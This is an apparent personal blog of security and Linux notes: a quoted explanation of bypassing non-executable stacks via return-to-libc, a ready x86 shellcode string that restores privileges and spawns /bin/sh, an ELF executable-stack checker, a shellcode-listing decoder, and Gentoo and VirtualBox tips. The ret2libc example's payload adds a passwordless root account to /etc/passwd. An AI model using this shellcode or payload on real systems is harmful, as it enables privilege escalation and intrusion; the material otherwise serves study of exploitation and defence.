Thursday, 27 January 2011

tips n tricks

$ echo -ne "SHELL" | ndisasm -u -

(SHELL stands for the \x-escaped bytes you want to look at; -u puts ndisasm in 32-bit mode and the trailing - makes it read the bytes from stdin instead of a file.)

Monday, 15 March 2010

Note on non-exec

http://seclists.org/vuln-dev/2000/Apr/252
Hope I can reproduce all of the cases here :)
1) Certainly the simplest case is when the programme calls system()
itself - just "return" to the call.

2) Call some other legitimate subroutine with rogue parameters. For
instance, call an initialization routine to read a bogus configuration
file.

3) Use some other part of memory that is both writable and executable.
For instance, a user-supplied string might be copied to a malloc()'ed or
static buffer at a predictable address, which might be executable.

4) Use a subroutine within the accessible address range to shift some
values around on the stack so that after two levels of return, the libc
routine is called with user-supplied arguments.

This needs a bit more explanation. Assume that there is a subroutine
that copies a value from, say, BP+8 to BP-0x14, (that'd be a parameter
to a local variable) and doesn't do anything much after that before
returning. Let the address of the subroutine, after the stack
manipulation on entry, be 0x88888888, and let the value of BP be
0xCCCCCCCC when the buffer overflow occurs. Let the address of the
system() function be 0x00102030.

The overflowed buffer could contain the following data at given
addresses (0xDEADBEEF denotes unimportant values):

0xCCCCCC80: the string "echo foo::0:0::/:/bin/sh >>/etc/passwd;"

0xCCCCCCCC: 0xCCCCCCEC - the value for BP for the sub at 0x88888888
0xCCCCCCD0: 0x88888888 - "return" address
0xCCCCCCD4: 0xDEADBEEF - value for BP when system() is called
0xCCCCCCD8: 0xDEADBEEF - will be overwritten by 0x00102030
0xCCCCCCDC: 0xDEADBEEF - address that system() returns to
0xCCCCCCE0: 0xCCCCCC80 - the parameter for system()
0xCCCCCCE4: 0xDEADBEEF
0xCCCCCCE8: 0xDEADBEEF
0xCCCCCCEC: 0xCCCCCCD4 - value for BP in the second end-of-sub
0xCCCCCCF0: 0x88888888 - any end-of-subroutine would do
0xCCCCCCF4: 0x00102030 - possible on a little-endian machine

Now, when the subroutine containing the overflow terminates, the value
of BP (0xCCCCCCCC) is moved to SP. Then BP gets the new value
0xCCCCCCEC from stack, and control returns to 0x88888888. This address
is in the middle of a subroutine, so BP is not pushed onto the stack and
replaced by the value of SP. The subroutine copies the value 0x00102030
from 0xCCCCCCF4 (BP+8) to 0xCCCCCCD8 (BP-0x14), moves BP to SP, pops
0xCCCCCCD4 into BP, and "returns" to 0x88888888. An irrelevant value is
copied from 0xCCCCCCDC (BP+8) to 0xCCCCCCC0 (BP-0x14), BP is moved to
SP, an irrelevant value for BP is popped from the stack (location
0xCCCCCCD4), and the subroutine "returns" to the address 0x00102030,
that is, to the system() library function. The value of SP is now
0xCCCCCCDC. At that address, system() expects to find a return address,
followed by the address of the parameter string. The system() function
passes the string at 0xCCCCCC80 to the shell, then returns to a bogus
address and crashes in this example.

5) Find a "jump to register" opcode somewhere, set up the register
suitably, then "return" to the address of the register jump. For
instance, if the subroutine containing the buffer overflow also parses a
decimal integer and leaves the result in DX before returning, you could
hunt for an opcode for "jump dx", including the value 1056816
(0x00102030) in the input and returning to the jump instruction. The
two-byte opcode (or equivalent) is reasonably likely to exist purely by
chance in most programmes except for quite small ones.

6) Ditto, but with a "syscall" opcode. I don't know how difficult this
type of exploit would be in practice, but it's theoretically quite
possible, at least in combination with (2) above.

Of course, buffer overflows can be exploited in ways that don't affect
the path of execution at all - directing some output to the wrong file
can be effective enough, for example.
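Cases 3 and 4 of the note above need memory that is both writable and executable, or a stack that is executable. The defender's counterpart is to check a binary for exactly those properties. The script below is an added example written for this page; it is not part of the original post or of the quoted seclists message. It parses only the ELF header and program headers (no third-party library), flags a PT_GNU_STACK header with the X bit, a missing PT_GNU_STACK header, and any PT_LOAD segment that is both W and X. The three ELF images it checks are constructed in the script itself (header-only, not loadable binaries); treating a missing PT_GNU_STACK as executable is the conservative reading of the classic Linux x86 default and is an assumption of this example.

```python
"""Report executable-stack and W+X mappings from an ELF file's program headers.

Added example for the ret2libc note; not part of the original post or the
quoted seclists message.  Parses only the ELF header and program headers.
"""
import struct
import sys

PT_LOAD = 1
PT_GNU_STACK = 0x6474E551
PF_X, PF_W, PF_R = 1, 2, 4


def parse_program_headers(data: bytes):
    """Return [(p_type, p_flags), ...] for a 32- or 64-bit ELF image."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    ei_class, ei_data = data[4], data[5]
    e = "<" if ei_data == 1 else ">"            # ELFDATA2LSB / ELFDATA2MSB
    if ei_class == 2:                           # ELFCLASS64
        e_phoff = struct.unpack_from(e + "Q", data, 0x20)[0]
        e_phentsize, e_phnum = struct.unpack_from(e + "HH", data, 0x36)
        flags_off = 4                           # Elf64_Phdr: p_type, p_flags, ...
    elif ei_class == 1:                         # ELFCLASS32
        e_phoff = struct.unpack_from(e + "I", data, 0x1C)[0]
        e_phentsize, e_phnum = struct.unpack_from(e + "HH", data, 0x2A)
        flags_off = 24                          # Elf32_Phdr: p_flags is the 7th field
    else:
        raise ValueError("unknown ELF class %d" % ei_class)
    headers = []
    for i in range(e_phnum):
        base = e_phoff + i * e_phentsize
        p_type = struct.unpack_from(e + "I", data, base)[0]
        p_flags = struct.unpack_from(e + "I", data, base + flags_off)[0]
        headers.append((p_type, p_flags))
    return headers


def check_nx(data: bytes) -> dict:
    """Summarise the stack and W+X situation of one ELF image."""
    headers = parse_program_headers(data)
    stack = [f for t, f in headers if t == PT_GNU_STACK]
    # With no PT_GNU_STACK header the loader falls back to its default; on
    # Linux x86 that traditionally meant an executable stack, so the absence
    # is reported as executable here (conservative reading, an assumption).
    stack_exec = bool(stack[0] & PF_X) if stack else True
    wx = [(i, f) for i, (t, f) in enumerate(headers)
          if t == PT_LOAD and (f & PF_W) and (f & PF_X)]
    return {"gnu_stack_present": bool(stack),
            "stack_executable": stack_exec,
            "wx_segments": wx}


def build_elf64(segments):
    """Constructed header-only ELF64 image for testing (not a loadable binary)."""
    e_ident = b"\x7fELF" + bytes([2, 1, 1]) + bytes(9)   # 64-bit, LSB, version 1
    ehdr = e_ident + struct.pack("<HHIQQQIHHHHHH",
                                 2, 62, 1, 0,            # ET_EXEC, x86-64, version, entry
                                 64, 0, 0,               # e_phoff, e_shoff, e_flags
                                 64, 56, len(segments),  # e_ehsize, e_phentsize, e_phnum
                                 64, 0, 0)               # e_shentsize, e_shnum, e_shstrndx
    phdrs = b"".join(struct.pack("<IIQQQQQQ", t, f, 0, 0, 0, 0, 0, 0)
                     for t, f in segments)
    return ehdr + phdrs


# Constructed samples: a hardened layout, a W+X / executable-stack layout,
# and one that omits PT_GNU_STACK entirely.
HARDENED = build_elf64([(PT_LOAD, PF_R | PF_X), (PT_LOAD, PF_R | PF_W),
                        (PT_GNU_STACK, PF_R | PF_W)])
WEAK = build_elf64([(PT_LOAD, PF_R | PF_W | PF_X),
                    (PT_GNU_STACK, PF_R | PF_W | PF_X)])
NO_STACK_HDR = build_elf64([(PT_LOAD, PF_R | PF_X)])


if __name__ == "__main__":
    if len(sys.argv) > 1:                       # check a real file from disk
        with open(sys.argv[1], "rb") as fh:
            print(check_nx(fh.read()))
    else:                                       # demo on the constructed images
        for name, img in (("hardened", HARDENED), ("weak", WEAK),
                          ("no-stack-hdr", NO_STACK_HDR)):
            print(name, check_nx(img))
```

Run it with a path to report on a real binary; with no argument it prints the verdict for the three constructed images. The same information is what `readelf -l` shows in its GNU_STACK line and segment flags, so this is a scriptable version of that check for a batch of files.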

Thursday, 3 December 2009

Install conky

# emerge conky
* You can find the sample configuration file at
* /etc/conky/conky.conf. To customize it, copy
* /etc/conky/conky.conf to ~/.conkyrc and edit
* it to your liking.
*
* For more info on Conky's new features,
* please look at the README and ChangeLog:
* /usr/share/doc/conky-1.6.1/README.bz2
* /usr/share/doc/conky-1.6.1/ChangeLog.bz2
* There are also pretty html docs available
* on Conky's site or in /usr/share/doc/conky-1.6.1
*
* Also see http://www.gentoo.org/doc/en/conky-howto.xml
*
* Vim syntax highlighting for conkyrc now enabled with
* USE=vim-syntax, for Nano with USE=nano-syntax
*

Thursday, 12 November 2009

Restore privilege and /bin/sh shellcode

My favourite shellcode: basically it calls setreuid() with the value returned by geteuid(), then executes /bin/sh.

"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5"
"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58\x4e\x41\x41\x41"
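Listings like the one above travel as C string literals, while the ndisasm tip at the top of the page wants raw bytes on stdin. The script below is an added example written for this page (not code from the original post) that serves both entries: it decodes a C-style "\x.." listing into bytes, reports every byte that came from a plain character rather than an escape sequence (a stray space inside such a listing silently becomes an extra 0x20 byte and shifts every instruction after it), and pipes the result into ndisasm when it is installed. The sample string inside the script is constructed for the demonstration and deliberately contains such a stray space; the two-hex-digit reading of \x is an assumption that matches these listings (C itself reads as many hex digits as follow).

```python
"""Convert a C-style "\\x.." byte-string listing into raw bytes for ndisasm.

Added example, not part of the original post.  Decodes the escapes, points
out characters that were NOT escapes, and optionally runs the page's
`ndisasm -u -` pipeline on the result.
"""
import re
import shutil
import subprocess

# Constructed sample in the same style as the post, with a deliberate stray
# space between \x2f and \x73 to show how such a typo is caught.
SAMPLE = r'''"\x31\xc0\xb0\x31\xcd\x80"
"\x2f\x62\x69\x6e\x2f \x73\x68"'''

# One token per C escape or literal character.  \x is taken as exactly two
# hex digits here (assumption: the form these listings use).
_TOKEN = re.compile(r'\\x([0-9A-Fa-f]{2})|\\([0-7]{1,3})|\\(.)|(.)', re.S)
_SIMPLE = {"n": 0x0A, "t": 0x09, "r": 0x0D, "a": 0x07, "b": 0x08,
           "f": 0x0C, "v": 0x0B, "\\": 0x5C, '"': 0x22, "'": 0x27}


def decode_c_literal(text: str):
    """Return (raw_bytes, literals) for one or more adjacent "..." pieces.

    literals is a list of (offset, char) for every byte that came from a
    plain character rather than an escape sequence, so a typo is visible
    instead of silently changing the byte stream."""
    out = bytearray()
    literals = []
    for piece in re.findall(r'"((?:[^"\\]|\\.)*)"', text, re.S):
        for m in _TOKEN.finditer(piece):
            hexv, octv, esc, raw = m.groups()
            if hexv is not None:
                out.append(int(hexv, 16))
            elif octv is not None:
                out.append(int(octv, 8) & 0xFF)
            elif esc is not None:
                if esc not in _SIMPLE:
                    raise ValueError("unsupported escape \\%s" % esc)
                out.append(_SIMPLE[esc])
            else:
                literals.append((len(out), raw))
                out.append(ord(raw))
    return bytes(out), literals


def disassemble(raw: bytes, bits: int = 32) -> str:
    """Pipe raw bytes into ndisasm (the page's tip; -u is the same as -b 32).

    Returns '' when ndisasm is not installed so the rest still works offline."""
    if shutil.which("ndisasm") is None:
        return ""
    proc = subprocess.run(["ndisasm", "-b", str(bits), "-"],
                          input=raw, capture_output=True, check=True)
    return proc.stdout.decode()


if __name__ == "__main__":
    raw, literals = decode_c_literal(SAMPLE)
    print("%d bytes: %s" % (len(raw), raw.hex()))
    for off, ch in literals:
        print("offset %d: literal %r was not an escape sequence" % (off, ch))
    print(disassemble(raw) or "(ndisasm not found; decoded bytes shown above)")
```

On the constructed sample the decoder reports the space at offset 11, which is the kind of defect that makes a disassembly listing look wrong from that point on; after removing it the string decodes to exactly the bytes the escapes spell out.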

Wednesday, 11 November 2009

Problem with VirtualBox Winxp Ethernet Adapter

After installing Windows XP as a guest on VirtualBox, I changed the NIC to Bridged, but got this error:
Failed to start the virtual machine name.
Failed to open/create the internal network 'HostInterfaceNetworking-eth0' (VERR_SUPDRV_COMPONENT_NOT_FOUND).
Failed to attach the network LUN (VERR_SUPDRV_COMPONENT_NOT_FOUND).
One of the kernel modules was not successfully loaded. Make sure that no kernel modules from an older version of VirtualBox exist. Then try to recompile and reload the kernel modules by executing '/etc/init.d/vboxdrv setup' as root (VERR_SUPDRV_COMPONENT_NOT_FOUND).

Googling it, I found a solution:
# modprobe vboxnetflt

API call Create New Process

Some API functions that create a new process:

- WinExec() (kernel32.dll)
- ShellExecute() (shell32.dll)
- ShellExecuteEx() (shell32.dll)
- CreateProcess() (kernel32.dll)
- CreateProcessAsUser() (advapi32.dll)
- CreateProcessWithLogonW() (advapi32.dll)

Tuesday, 10 November 2009

Install eclipse

First of all, I search through the packages to find anything useful :)
# emerge --search eclipse
So I found eclipse-sdk.
Next I emerge it:
# emerge eclipse-sdk
It said the j2sdk package has a download restriction, so I have to download it manually and put it in
/usr/portage/distfiles
After that we can:
# emerge eclipse-sdk